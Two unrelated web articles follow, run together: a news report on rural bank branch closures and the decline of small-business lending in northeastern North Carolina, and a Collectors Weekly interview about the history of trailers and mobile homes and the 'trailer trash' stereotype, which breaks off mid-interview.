The financial fabric of rural America is fraying. Even as lending revives around cities, it is drying up in small communities. In-person banking, crucial to many small businesses, is disappearing as banks consolidate and close rural branches. Bigger banks have been swallowing community banks and gravitating toward the business of making larger loans.

Distant banks with few ties to local communities—which often rely heavily on algorithms to gauge creditworthiness—are also less likely to have the personal relationships that have helped local bankers judge which borrowers were a good bet.

The phenomenon, almost automatically, is getting worse. Bankers say they don’t see enough business in small towns. Small towns say bank closings make it harder to do business.

“We’d like to make loans in all the markets we are in,” says R. Lee Burrows Jr., chairman of Union Bank in Greenville, N.C., population 91,495. “But sometimes the demand isn’t there,” he says. Banks’ “risk tolerance is substantially lower than it was pre-2008,” he says. Union was called “the little bank” until July, when it acquired another bank and moved from Kinston, population 20,923.

Southern Bancshares Inc. and PNC Financial Services Group Inc., the lenders Ms. Baker contacted, say they don’t comment on specific customers.

The value of small loans to businesses in rural U.S. communities peaked in 2004 and is less than half what it was then in the same communities, when adjusted for inflation, according to a Wall Street Journal analysis of Community Reinvestment Act data. In big cities, small loans to businesses fell only a quarter during the same period, mainly due to large declines in lending activity during the financial crisis. Adjusted for inflation, rural lending is below 1996 levels.

Of America’s 1,980 rural counties, 625 don’t have a locally owned community bank—double the number in 1994, federal data show. At least 35 counties have no bank, while about 115 are now served by just one branch.

“There’s been a slow seep, a slow letting air out of a balloon over a long period of time,” says Camden Fine, chief executive of Independent Community Bankers of America, a small-bank trade organization. “There’s less demand for credit. There’s less supply.”

Colorado State University economist Stephan Weiler found that declines in small-business lending in rural areas are linked to declines in the number of new businesses two to three years later—a phenomenon he didn’t find in urban areas. The falloff in lending is particularly important, he says, because other types of startup capital are typically scarcer in rural areas.

“To say that I am concerned is an understatement,” says Ray Grace, North Carolina’s commissioner of banks. The number of community banks is shrinking, and larger banks are taking deposits gathered in rural areas and deploying them in urban communities, he says. “It sucks the capital out of rural communities.”

Between 2009 and June 2017, North Carolina counties currently considered rural by the Centers for Disease Control and Prevention lost 131 bank branches, banking-regulator data show. That 18% drop compared with a 2% drop in Mecklenburg and Wake counties, home to Charlotte and Raleigh.

The gap is the more striking because North Carolina is a banking center, home to Bank of America Corp. and BB&T Corp. Bank of America has eight branches in seven rural counties in the state, down from 21 in 17 rural counties three years ago. “As the U.S. population continues to move to larger population centers,” a Bank of America spokesman says, “we want to insure that our branch coverage matches where people are moving.”

Around Roxobel, population 220, and other parts of rural northeastern North Carolina, the banking gap is hurting business. Three months after PNC closed a bank branch in Colerain, population 187, Tommy Davis closed his Nationwide Insurance office there. Losing the bank branch meant he had to drive 25 minutes each way daily to make deposits. And he lost foot traffic from people who once dropped by on their way to and from the bank.

“It’s really like a death sentence for a small town because the bank is the center of all activity,” says Mr. Davis, who owned the Colerain location for 20 years. He moved the business to Windsor, a larger town 25 miles away.

Twelve miles north of Roxobel in Woodland, population 729, Sharon Ramsey closed the DeJireh Grill because, she says, she couldn’t get bank financing. At first, she says, the restaurant “was turning a profit, but it was just enough to stay open.”

She was told she didn’t have enough credit history to qualify for a loan, Ms. Ramsey says. She closed DeJireh in 2013 after three years to focus on her variety store in nearby Conway, which lost its only bank branch several years ago.

Southern closed its Woodland branch three years ago. Then the local grocery store shut down. The loss of both means “most people drive through here” without stopping, says Joe Lassiter, owner of Lassiter’s Used Cars. He keeps no more than 10 cars on his lot, down from about 20 before.

Barbara Outland, owner of Grapevine Cafe down the street, drives 11 miles to Murfreesboro, N.C., to get change and make deposits. Ms. Outland, 71, says that as defense against any thieves eyeing that cash she locks up at night with a .38 Smith & Wesson revolver “in my hand, in plain view for all to see.”

Woodland Mayor Kenneth Manuel says Southern rejected the town’s request for an ATM, saying it needed 4,000 transactions a month to justify one.

Southern Senior Vice President John Heeden declines to comment on Woodland. “It is never easy to make such decisions that impact our friends and neighbors in these close-knit communities,” he says, “and Southern Bank certainly takes these decisions very seriously.”

The bank, with $2.6 billion in assets, was started by local investors in 1901 as Bank of Mount Olive. It has 61 branches, including the only bank in Woodland’s Northampton County. Southern says that 36 of its branches are in towns with populations under 6,000 and that in most areas where the bank has closed branches, there is another bank fairly close. “Southern Bank embraces its ongoing commitment to serve rural communities that are overlooked by many of our larger competitors,” Mr. Heeden says.

In considering closures, he says, “profitability and market dynamics are primary drivers, along with other factors that can vary over time and by market.”

Rural communities in parts of the U.S. have become less attractive to local banks because they are suffering from a variety of economic ills that have taken a toll on business activity and new business formation.

Weak school systems have made many rural communities less attractive to employers, says Peter Skillern, executive director of Reinvestment Partners, a nonprofit based in Durham, N.C., that works with rural communities.

Dollar stores and big-box retailers drained customers from some local shops. The financial crisis left some residents with battered credit and collateral. Populations dropped as youth moved out.

These communities have been hurt by declines in the textile and furniture industries, consolidation in agriculture and decreased government support for tobacco. Average annual employment in North Carolina’s 80 rural counties fell 6% between 2007 and 2016, according to the Raleigh-based NC Rural Center, compared with a gain of 11% in its six urban counties.

“It would be great if there were branches and people in all these rural communities,” says Kel Landis, former CEO of RBC Centura, which once owned the rural North Carolina bank locations purchased by PNC in 2012. “But I do understand, as a former banker, the economics. If you have a place that used to be thriving, but the downtown has closed up, having a branch there is a money-losing proposition.”

Another headache for bankers in rural areas, says Jerry Rexroad, CEO of Carolina Financial Corp., is that “it’s very hard to find highly competent commercial loan officers who want to live in these small towns and can produce an adequate amount of production.” He said rural businesses often have less sophisticated reporting systems that make their finances tougher to analyze.

Carolina Financial, of Charleston, S.C., in November acquired First South Bank, of Washington, N.C. “The smaller towns are really more for deposit-gathering that gives you funds to lend to larger towns,” says Nick Nicholson, chief credit officer of First South Bank.

Carolina Financial’s Mr. Rexroad says it is “equally committed to growing our market share in rural and urban markets,” and recently assigned senior loan officers to help cover rural areas.

Small-town businesses say bank pullbacks weaken local economies further.

PNC installed an ATM 6 miles from Woodland in Rich Square, population 884, when it closed its branch there in 2016, leaving the area without a bank branch for the first time since 1902 (see related article).

“It’s hard to get a business to come in” when there is no bank to cash workers’ paychecks, says Rich Square Town Commissioner Reginald White. Rich Square has a barber shop, grocery, hardware store, pharmacy, post office and three restaurants. But the storefronts on one side of Main Street are vacant.

Horace Robinson, owner of Upper Cutz Barber Shop on Main Street, makes weekly deposits at the ATM. When he needs change, he unlocks his soda machine or one of the shop’s arcade games rather than drive to a PNC branch 17 miles away.

A PNC spokeswoman says the bank “continuously evaluates its branch network to assure we are meeting customer needs in a cost effective way.” Customers, she says, “are banking very differently today” with online and mobile channels and ATMs.

After deciding to close the Rich Square branch, PNC “contacted 15 banks, in some cases multiple times,” in an unsuccessful effort to find another financial institution to take it over, she says. PNC donated the branch to the community, installed a full-service ATM and made other investments, she says.

Ms. Baker, the peanut-business owner, says 45 years ago, when her mother moved her ceramics classes from home to a storefront, a local banker took a personal interest in the business and gave her a loan.

In Ms. Baker’s 15,000-square-foot operation, workers make peanut brittle and water-blanch and fry peanuts, then season them or cover them in chocolate. It employs up to 18 during peak season.

When she sought a loan to expand into a new building, she figured the family’s decades-old relationship with Southern would help get her one. Instead, she says, a banker at Southern “told me I should close the business down” or operate it just during the busy Christmas season. PNC, she says, told her there wasn’t enough foot traffic to support a store.

She received a loan from Carolina Small Business, a nonprofit lender a two-hour drive away in Raleigh. It offers financing, education and training to small businesses but doesn’t collect deposits or offer checking accounts, wire transfers and other traditional banking services.

Because it takes so long to get to the closest PNC branch, where she does her business, Ms. Baker sometimes makes deposits at a Southern branch about 8 miles down the road. Doing business with two banks, she says, means “you end up having double fees.”

Simple transactions require more planning. Employees must leave earlier to cash their paychecks, says Ms. Baker, who plans to add automatic deposit next year. When the peanut business runs out of change, Ms. Baker and employees go through their pocketbooks.

Moving to a town with more foot traffic might have made sense, but her business “was like that last thing in our town,” she says, and “I didn’t want to take it away.”

Write to Ruth Simon at ruth.simon@wsj.com and Coulter Jones at Coulter.Jones@wsj.com

Home in a Can: When Trailers Offered a Compact Version of the American Dream

Mobile homes have a bad rap. The minute you utter the words, “trailer park,” many people will come back with stereotypes about “trailer trash,” or slovenly, ignorant, beer-swilling yokels who leave busted appliances and inoperable cars outside their mobile homes. The “trailer trash” caricature has been all over pop culture the past few decades—from Cousin Eddie in the “Vacation” movie series to Jeff Foxworthy’s redneck comedy to “The Trailer Park Boys” TV and movie series. And the animosity toward the poorest and least educated trailer-dwellers has recently taken on a political dimension, as it’s often incorrectly assumed that everyone who lives in a mobile home must have voted for Donald Trump.

Oddly, cramped living quarters are making a comeback, under the guise of artisanal “tiny houses”—many of which resemble a wheeled trailer dressed up like a log cabin. Sold as a more sustainable way of living, tiny houses are considered stylishly rustic and telegraph a sense of moralistic simplicity that’s popular with the educated elite. But in places like San Francisco, where the land is often more valuable than the buildings that sit on it, where the heck do you park a tiny house … in a trailer park?

While tiny houses have dodged the “trailer trash” stigma, many types of shelters get lumped into that stereotype: Camping or travel trailers are shelters meant to be pulled to campsites by an automobile. Recreational vehicles (RVs) have the living quarters built into the auto itself, and are mostly used for camping. Mobile homes, like travel trailers, are meant to be pulled to a location by a truck, but they often stay in one spot for decades. Today, mobile homes have morphed into wheelless “manufactured homes,” which are delivered to trailer parks via flatbed trucks. In time, mobile and manufactured homes have grown to be as large as regular “stick-built” homes, taking up two or three lanes on the highway, a size that would be downright extravagant to a disciple of tiny-house minimalism.

Top: "Life in a Trailer Park in Florida" involved flower beds and socializing, according to this 1950s Tichnor linen postcard. Above: A 1960s advertising postcard promotes a two-bedroom trailer in the "Mobile Home Section" of Orange Blossom Hills, Florida. (Images via eBay)

Top: “Life in a Trailer Park in Florida” involved flower beds and socializing, according to this 1950s Tichnor linen postcard. Above: A 1960s advertising postcard promotes a two-bedroom trailer in the “Mobile Home Section” of Orange Blossom Hills, Florida. (Images via eBay)

Mike Closen and John Brunkowski—who split their time between Maine and Florida—think the classist shaming of trailer-park living needs to end. Even though they’ve never lived in a mobile home full-time, the couple have been avid RV campers for the past three decades, and they’ve bought mobile homes for their parents. Their obsession with camping, RVs, and mobile homes has given them quite the collecting bug. They have accumulated more than 20,000 trailer-related postcards, as well as several thousand other objects, including RV, trailer, and mobile-home toys and models; advertising pinbacks; matchbook covers; cups; magazine ads and articles; books; clothing patches; and emblems from the coaches themselves. Together, they’ve published seven books on the topic, including one focused on Kampgrounds of America, one exclusively about Airstream collectibles, and their latest, Don’t Call Them Trailer Trash: The Illustrated Mobile Home Story, published by Schiffer, which is about their collection as a whole. Through their objects, you can see the trajectory of mobile-living from horse-drawn carriages to sleek (and still beloved) metallic Airstream trailers to mobile-home parks as a surprisingly posh alternative to 1950s suburbia, where you get the white-picket-fence dream at a discount and everyone in the neighborhood goes swimming and square dancing together. I spoke with Mike Closen over the phone and he told me the true mobile-home history that, so often, gets overshadowed by the stereotypes.

Collectors Weekly: When you talk about trailers, that encompasses both campers and mobile homes, right?

Closen: Yes, and you’re hitting on one of the issues that we’ve confronted with all seven of our books about RVs, campers, and mobile homes. There’s no bright line between a travel trailer and a mobile home. Some of the shortest trailers in the world, 10- to 15-foot-long trailers, are put in one spot and never leave it, and people manage somehow to reside in that. So it becomes a fixed-place home, even though it’s very short. On the other hand, there are some very long trailers that go on the road all the time.

Lucille Ball and Desi Arnaz’s 1953 comedy, “The Long, Long Trailer” boosted mobile-home and travel-trailer sales in the 1950s.

Lucille Ball and Desi Arnaz made that point in their famous 1953 movie “The Long, Long Trailer,” which inspired a lot of Americans to consider living in mobile homes. Although Lucy and Desi poked fun at the RV lifestyle in the movie, audiences were impressed with the magnificent, upscale trailer they drove across the country. It had a bathroom with an early, primitive trailer shower. The film was so popular that a couple of manufacturers hired Lucy and Desi to advertise their mobile homes. We have a copy of that movie in each of our homes, in Maine, in Florida, and in our RV. I’ll bet John and I have watched the movie at least 40 times over the years; we can quote lines from it.

Collectors Weekly: Do mobile homes always have wheels?

Closen: Yes, though that doesn’t distinguish what a mobile home is and isn’t anymore. Certainly, a mobile home—just as with a manufactured home—has to be moved down the highway to get it from the factory to its final location. Whether the wheels are left on or not, it’s still a mobile home. In a lot of states, wheels determined whether you had to have a license plate on the vehicle. It also affected whether the unit became part of the real estate versus whether it continued to be personal property sitting on top of the land.

Vagabond’s metal emblem for its mobile homes and travel trailer, circa 1940s-’50s, depicts a hobo with a bindle. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: I noticed you have a lot of trailer-trash gags in your book. Do you enjoy that kind of humor?

Closen: Well, it’s out there, and it can’t be avoided. For this book, we decided that each chapter would begin with items perpetuating the trailer-trash myth, like the Jeff Foxworthy book, Redneck Extreme Mobile Home Makeover. After we draw you in, we attempt, in our lighthearted way, to reverse that notion. But when collecting trailer memorabilia, you can’t get away from the trailer-trash concept, because much of it is self-inflicted by the industry. For example, in the early days of trailers, Vagabond produced upscale, high-quality travel trailers and small mobile homes—and yet the Vagabond emblem affixed to the sides of their trailers featured a hobo with a bindle over his shoulder. Some of their trailers were even equipped with lamps or salt-and-pepper shakers shaped like a hobo with a bindle. Other companies put out all sorts of advertising with bawdy images of scantily clad women, including promotional playing cards and other memorabilia. Some of the stereotypes can be attributed to the industry execs, who should’ve been more aware of what they were doing.

The trailer-trash myth took off after World War II, when soldiers coming back from the war were faced with a housing shortage. Much of the travel-trailer and mobile-home industry got its jumpstart at that time. Confronting the housing situation, a lot of returning servicemen chose to move into RVs and mobile homes, at least for the short-term. It’s unfortunate that our veterans were also then associated with this notion of being “trailer trash.” In the ’40s, people living in “regular” homes also looked upon those in RVs and mobile homes as “trailer trash” because they had to go to the outhouse or the campground wash facilities just to use the toilet. We have hundreds of postcards in our trailer-themed collection just about outhouses.

A linen comic postcard, circa 1940, shows a man rushing to an outhouse from his trailer. (Via eBay)

Collectors Weekly: What were the predecessors to mobile-home living?

Closen: We’ve been looking at mobile-home culture for a long time, and we’ve traced the mobile lifestyle in the United States back to Native Americans. Historically, they haven’t been credited with contributing to the development of the RV and mobile-home industry. It was the settlers moving across the country in their covered wagons that are credited with having the first mobile homes—and that doesn’t surprise me. If we really want to be serious about history, we need to credit nomadic tribes for devising ways to move their homes behind their horses and carry their tepees. They were doing it long before the pioneers were moving across the country in their more luxurious Conestoga wagons.

In general, settled people tend to look down on “nomads.” But with the expansion of the country from east to west after the Louisiana Purchase in 1803, the settlers living in a horse-drawn trailer or wagon were seen as heroic, confronting their fears of the unknown, including their fears of the Native American tribes living in the West. In the United States, the pioneers put a positive spin on the notion of being a nomad.

This tourist postcard labeled “Montana Sheepwagon, Sheepherder’s Mobile Home” shows an early wagon with a house-sized door. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Once homesteaders established farms and ranches, they hired cowboys to rustle cattle on the open range and farmhands to till the soil on fields far from the main house. These workers relied on horse-drawn wagons when they were miles away from a town or the central farm, and those wagons served as cooking facilities and bunk houses.

In the 19th century, you had all sorts of outcasts wandering the country by train or horse-drawn wagons. Salesmen, as well as circus and carnival people and performing minstrels, traveled from city to city or area to area to earn their livelihoods. Reform Christians found wagons useful, too; they toured the country hosting big-tent revivals and converting new believers.

An undated postcard shows “gipsies,” or Romani nomads, outside their horse carriages. (Via eBay)

Collectors Weekly: In Europe and some parts of America, the nomadic lifestyle is also associated with the Romani people (disparagingly referred to as “gypsies”) and their horse-drawn carriages.

Closen: Yes. That wandering-gypsy stereotype, along with that of the train-hopping hobo, was associated with mobile homes for decades. In our collection, we have a mocking late-1930s “New Yorker” cartoon depicting a couple in gypsy clothes attending a New York City car-and-trailer show. Yet, in the early years, a number of campgrounds and manufacturers used romanticized images of gypsies to help sell their RVs.

Collectors Weekly: In the book, you show the bathing machines that the modest turn-of-the-century Europeans used. Did they also influence trailer design?

Closen: The bathing machines were towable dressing rooms used by beach-goers for a very brief period of time. By including them in the book, John and I were simply pointing out some of the shelters in the long line that eventually led to upscale travel trailers and mobile homes. People could sit or relax in their dressing rooms. They could change in and out of their swimwear. They would leave their possessions in them, and then go outside and swim or sit at the beach. Covered-wagon living was just an extended form of that: You kept your clothes, food, and belongings in the wagon. But you cooked outside, and you didn’t eat inside the wagon unless the weather was inclement.

Bathing machines were popular for “L’Heure du Bain” (“The Hour of the Bath”) at the beach in Boulogne-sur-Mer in Northern France in the early 1900s. (Via eBay)

Collectors Weekly: How did trailer camping evolve into a form of vacation in North America?

Closen: In the late 19th century, we started having campgrounds and campsites in the U.S. and Canada, and tent campers were often delivered to the site via train. The wealthiest people in Canada and England continued to go on extended tours of the countryside by rail up until the late 1930s and early ’40s. Instead of using a travel trailer or tent, they would hire an entire lavishly appointed train car, and they brought their servants to attend to them. Their train car would be towed along, and then placed on a railroad siding for a period of time so the tourists could see the sights. Then the car would be picked up by another train and towed to the next location for a sizable sum of money. It was, again, a sort of mobile home. At least temporarily, these rich folk were living out of a train car.

What car camping looked like in the 1920s.

When automobiles were first mass-produced in the United States around 1900, Americans who could afford vehicles began auto camping. You used your car as part of the camper. People would drive their car down the road, stop somewhere remote on the roadside, and then set up a tent-like contraption. Sometimes they attached a canvas sheet to the top of the car and then propped the other side up with poles. Sometimes they’d park two cars next to one another and stretch a canvas between the tops of the cars.

On the very earliest truck chassis, people would build shelters that had fold-out devices similar to today’s slide-outs that could be covered in tent canvas. By the 1920s, Americans were making their own trailers they could attach to the back of their cars and tow. These early trailers tended to be very short because you didn’t have a very powerful vehicle to pull them. They were rickety contraptions, built of every conceivable material, mostly wood and the sort of canvas that would have been used on a covered wagon.

This 1922 mobile home was hand-built on a truck chassis. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Where did the campers go?

Closen: They’d show up in established parks or pull over to the side of the road and camp on empty-seeming farmland, although certainly they were trespassing on private property. By the 1920s, a lot of municipalities figured out that all these people traveling along the roadways needed a place to go. Several thousand parks or camps sprang up along the highways of America. Those would’ve had primitive outhouse facilities, but not much more than that. With each passing year and decade, those facilities expanded and improved. As building trailers to camp and reside in caught on, there was an almost instant parallel growth and development of places for them to go. They were called tourist parks, trailer parks, tourist camps, and fish camps—which, by the way, didn’t help. That was more of the trailer-trash stereotype: “Oh, there’s a fish camp down the road where you can stay.”

This unused tourist postcard, circa 1930-’40s, shows a couple at a so-called “fish camp.” While fishing and boating were popular vacation activities, trailer parks on the water often had low-quality facilities, garnering them a bad rap. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Besides camping, what were early trailers used for?

Closen: Earlier trailers also served commercial purposes. We have a photo of a tiny trailer that a barber used to travel to little towns and give haircuts. I recently found a great old photo of a traveling post office from 1920s Great Britain. The postmen hooked a wagon to a vehicle and drove it to isolated rural areas that otherwise wouldn’t have mail service. One worker sat in the wagon and did the sorting while the other drove.

Collectors Weekly: What were the first manufactured trailers like?

Closen: In the beginning, of course, no factories made these travel trailers. You had to make your own. The next step was that people who first made trailers started selling the instructions to other people who wanted to build their own. Then early entrepreneurs started what they called factories, but they were really workshops that had more than one person building these trailers. Eventually, trailer manufacturers adopted Henry Ford’s assembly line.

The first factory-made travel trailers, the forerunners of the Airstream and the other metal coaches, came along in the early 1930s, using the same material that airplane fuselages were made of at the time. They had to be built of lightweight metal like aluminum to be towed down the road. Airstream got its start in the 1930s and took off. Today, Airstream is the longest-operating manufacturer of travel trailers in the United States, thanks to their unique design and roadworthiness.

A 1960s Mickey Mouse Club puzzle portrays Mickey and friends vacationing with a “canned ham” style travel trailer. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: That’s when you got what they called the “canned ham”?

Closen: Actually, the canned ham was a fairly early design, even before factory-made trailers. Americans made their own trailers in the shape of a canned ham because it was somewhat aerodynamic, but more importantly, the highest point in the trailer was in the center, where people would stand and need the headroom. At both the front and the back of the trailer, you see a curvature so that there’s less headroom, but that’s where the bed, table, chairs, or storage would be. Certainly, you are absolutely correct that the canned-ham look was a very popular metal factory-made design, as well.

Here’s an interesting footnote: In 1930s Great Britain, the boxy trolley design was more popular than the canned ham. Down the center of the trailer, it had a raised area like a trolley car has because that’s where you needed the headroom. On the sides, there would be beds, cabinets, seating, and so on.

The horse carriage in this missionary postcard, sent in 1904, features the trolley design that was adopted for early British trailers. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Let’s talk about the aftermath of World War II. Before the war, most servicemen had been living with their parents, correct?

Closen: Yes, because of the age of the people who were drafted into the military. My dad was among them. He was at home at that point in life, and then the war came along and interrupted college—even high school for a lot of those folks—because they were on the cusp of adulthood. The U.S. military was mostly made up of young men at that time. When they came back, they were full-fledged adults, ready to move away from living with the family. I know that after I first left home to go off to college, after I had my first taste of freedom, there was no way I was going to live under my parents’ roof again.

Collectors Weekly: After the war, why didn’t the soldiers live in apartments in the cities?

Closen: At that time in history, the larger cities were not structured in such a way that there was enough land or enough apartment buildings for the returning soldiers. It was before the era of the high-rise condominium, and the towns had been built up to the point that every inch was occupied by structures. I think the overcrowding at the end of the war was one of the principal reasons for the movement to the suburbs as well as campgrounds and mobile-home parks.

This trailer ad in the March 9, 1946, edition of “Saturday Evening Post” refers to the post-World War II housing shortage. You can see that the living quarters in the cutaway have no bathroom. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Were mobile homes cheaper than cottage houses?

Closen: Oh, yes. From the beginning of trailer manufacturing, makers were savvy enough to build mobile homes in various lengths, so that the length affected the cost. You have to remember that in the mid-’40s, the technology wasn’t there to put bathroom facilities in trailers. Even after the technology was developed in the late ’40s, there were still almost no trailers with bathrooms. Vagabond was one of the earliest companies to put a tiny, little toilet in the corner of one of its models. It was in the bedroom, and they had a dresser built over the top of it with a swinging door below. You could swing the door out to find a tiny toilet bowl. That was the extent of the bathroom—no basin, no shower, no nothing.

Collectors Weekly: Did returning soldiers view mobile homes as permanent or temporary dwellings?

Closen: I think most veterans viewed them as temporary housing until they got their feet on the ground and could move on. For one thing, the trailers were not as well-built as they are today, and they wouldn’t have been roadworthy for a long time. (The exceptions to the rule, of course, were the Airstream trailers. Something like 70 to 75 percent or so of all Airstreams ever made are still roadworthy.) Many millions of people came back from the war before most of the suburban stick-built residences were built. Some of them became permanent residents of trailers.

Collectors Weekly: It almost sounds like those trailer parks were an extension of being in a bunker or on the ship.

Closen: Oh, yeah! On the ship, the men would be living in dormitories with multiple bunks, so at least the trailers were private. A lot of those soldiers came back, got married, and had kids—the Baby Boomers were the product of that. A lot of folks would’ve been conceived in trailers.

This 1950s Mobile Homes Manufacturers Association ad from “Life” magazine boasts about the “modern” bathroom innovations featured in the latest trailers. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: When did trailers get bathrooms and how did that plumbing work?

Closen: In the early ’50s, the technology for trailer bathrooms developed to the point most manufacturers could include them in mobile homes and RVs, and that’s when the interest in both of those kinds of coaches exploded. Before then, outhouses in campgrounds and mobile-home parks served the people who lived there.

Mid-century bathroom technology truly was the thing that allowed RVing and mobile homes to flourish. Almost immediately, the campgrounds and mobile-home parks came up to speed by providing the water and sewer utilities that they could hook into. When all of that came together, two multi-billion-dollar industries were born.

With travel trailers, you’d pull into a campground, hook up a hose to a water spigot, another hose to the sewer, and plug in for your electricity. When you’re ready to leave, you’d just unhook everything, go to the next campground, and repeat the process. In a mobile-home park, your mobile-home is effectively the equivalent of a stick-built house, hooked up to the local water, sewage, and electricity systems. In a campground, you pay a flat fee for sitting there, whereas with the mobile home, you get separate utility bills for each service.

A 1952 "Saturday Evening Post" article reads, "If you pity families who raise kids in house trailers—don't. Their dwelling may have cost more than yours, it's just as convenient, and a lot less trouble. Here's how these happy gypsies live." (From Don't Call Them Trailer Trash, courtesy of Schiffer Publishing)

A 1952 “Saturday Evening Post” article reads, “If you pity families who raise kids in house trailers—don’t. Their dwelling may have cost more than yours, it’s just as convenient, and a lot less trouble.” (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Did trailer parks become more fashionable and “suburban” in the early ’50s?

Closen: Yes, and they could be as good as or better than the suburbs. There were plenty of people who had stick-built homes that were not as nice, as modern, or as well-kept as many mobile homes. That’s why the trailer-trash myth needs to be debunked. It’s too quick a stereotype.

Collectors Weekly: How did the name of a mobile-home park determine its respectability?

Closen: There is a lot of significance in a name. If you call your park the Closen Fish Camp or Trailer Park, it’s going to have a different image than if you call it Northwest Villa, The Estate, Southern Resort, or The Marina. It’s just like curb appeal. Some of these places have been smart enough to call themselves some pretty fancy names, but they are still entry-level communities.

Around the United States, there have been a lot of upscale mobile-home communities. They are gated, pristine, and well maintained. The units in them are high-end mobile-home residences populated with people of wealth and education. Some even have golf courses, fine dining, bars, and swimming pools, like country-club living.

This 1950s advertising postcard for Blue Skies Trailer Village near Palm Springs, California, brags, “It is the concept of Bing Crosby, President. Co-habitues (and landlords) include Humphrey Bogart and Lauren Bacall, Jack Benny, Barbara Stanwyck, Danny Kaye, Greer Garson, George Burns and Gracie Allen, Jose Ferrer and Rosemary Clooney, Claudette Colbert, and many others.” (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Bing Crosby had his own trailer park?

Closen: In the mid-century, numerous celebrities, from Lawrence Welk to Bing Crosby, had trailer residences. I’ve always thought it stemmed from the fact that when those actors and actresses were on a film site, they used mobile trailer units for their dressing rooms. They had probably become accustomed to their trailer, and then saw a mobile home as perhaps an attractive way to live.

But, in a number of those situations, to be fully honest, those people were investors in premier trailer parks and were undoubtedly being rewarded for their advertising endorsements. Certainly, it was helpful to the owners and developers of mobile-home communities to be able to say, “Oh, Lawrence Welk lives here” or “Bing Crosby lives here.”

This advertising postcard for Geer Mobile Homes in Grand Island, Nebraska, circa 1950s-’60s, shows a Mid-Century Modern style kitchen with the latest appliances. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Can you tell me a little bit about how Mid-Century Modern style influenced mobile-home design?

Closen: The Mid-Century Modern look was mostly seen in the interior design, with the colors, furnishings, and wall coverings. Mobile homes need to be boxy, unlike canned ham or Airstream travel trailers. You want the full headspace, so the exterior of mobile homes was never really influenced by design trends. But the interiors changed with every fad, like the shag carpeting that you and I lived through at one awful, awful time. They can be remodeled as often as a stick-built house, so people can make their interiors current and fashionable anytime they like.

Collectors Weekly: In the 1950s, when pin-ups were often used for advertising, did this create an association with promiscuous women living in mobile homes?

Closen: Oh, yeah, and that’s largely a fiction. Issues of infidelity can be present anywhere, under any circumstances. Again, part of the stereotype is that low-life, low-quality people live in mobile-home parks.

This 1946 comic linen postcard by Curt Teich Co. of Chicago depicts trailer dwellers as country bumpkins and the social aspect of trailer parks as a threat to marriage. (Via eBay)

Collectors Weekly: It seems like mobile-home parks had a social aspect that suburban subdivisions lacked.

Closen: For sure. At an RV park, you might have a picnic table and a grill where you can cook out and eat. However, from the earliest days of the mobile-home parks, the notion was that this trailer was going to be your home. You had a bit more space around you, so you could have a white picket fence, a flower bed, and a dog or cat. But since the whole park is a sovereign entity of sorts, there’s a boundary around it, and the people within it are then part of a community. Virtually every park had a community center or a clubhouse, where they held meetings, shared weekly coffee hours, played bingo or shuffleboard, square danced, and hosted potlucks. I think mobile-home living has been far more successful at community-building than life in a high-rise.

As a young professional in a big city, I lived in a number of high-rise buildings, and I didn’t even know my neighbors next door. In some respects, the much-maligned mobile-home parks have even better lifestyle opportunities than other housing. We housed my mother and father in a manufactured house here in Florida, which was placed in a mobile-home park with more than 800 coaches. They have a huge clubhouse with a ballroom, a swimming pool, shuffleboard, tennis, and a club for almost every hobby in the world. Some people who consider themselves loners are happier when they have privacy. But for people who are social animals, the mobile-home park is a great place to live.

A resident of the Homecrest Mobile Home Park would have worn this patch on his or her jacket around the 1950s-’60s. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: In the book, you show mobile-home park membership patches. Would people put them on their clothes and wear them with pride?

Closen: Oh, yes, for sure. In mobile-home and RVing communities, people sewed fabric patches onto their jackets indicating their allegiance to their mobile-home park or their trailer or RV manufacturer, like Winnebago, Airstream Club, or New Moon. Winnebago, for example, has the Winnebago International Travelers, or WIT, which holds regional and national conventions. You would wear the emblem on your jacket or fly a flag from your RV.

Collectors Weekly: How was ham radio connected to trailers?

Closen: Around the world, most amateur radio, or ham radio, operators broadcast from their homes. But people with travel trailers or RVs realized that moving around increased the range of their opportunities to communicate with other amateur radio operators. It was especially popular in the ’60s and ’70s. You’d be sitting there at your radio with your headset talking to somebody in Spain or Russia. People wanted to document this connection in writing, so they would keep log books. They would often send a postcard to the person they spoke to and ask that person to send them a card in return. It didn’t take long before people weren’t sending just plain white or beige postcards. They were putting images on the postcard, called a QSL card, and often it was an image of their RV, trailer, or mobile home.

This QSL card from the 1970s shows a ham-radio antenna on top of a “gypsy” wagon. (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: I’m from Oklahoma, and I always heard it was a bad idea to be in a trailer during a tornado.

Closen: Or a flood. Water and mobile homes don’t mix. If a stick-built house is in the path of floodwaters, the house might be damaged significantly, but it’ll usually still be there. A mobile home, like a car, is a contained unit, and if much water comes along, it’s going to sweep the mobile home away. During tornadoes and storms, mobile homes just are not as structurally sound as stick-built homes.

Collectors Weekly: It’s the downside of being poorer, right—you have to buy a cheaper house and then it’s more likely to fall down?

Closen: Yes, exactly. It almost seems like tornadoes target mobile-home parks. But in reality, what happens is that mobile-home parks simply suffer more damage from those storms. It is a fact of life, but the risky nature of mobile homes is also part of the trailer-trash concept.

Some collectors are drawn to mobile-home license plates, like this 1976 tag from Oklahoma, a state that’s famous for its tornado season. (Via eBay)

Collectors Weekly: You mentioned in the book the stereotype of people keeping appliances and spare tires outside their trailers.

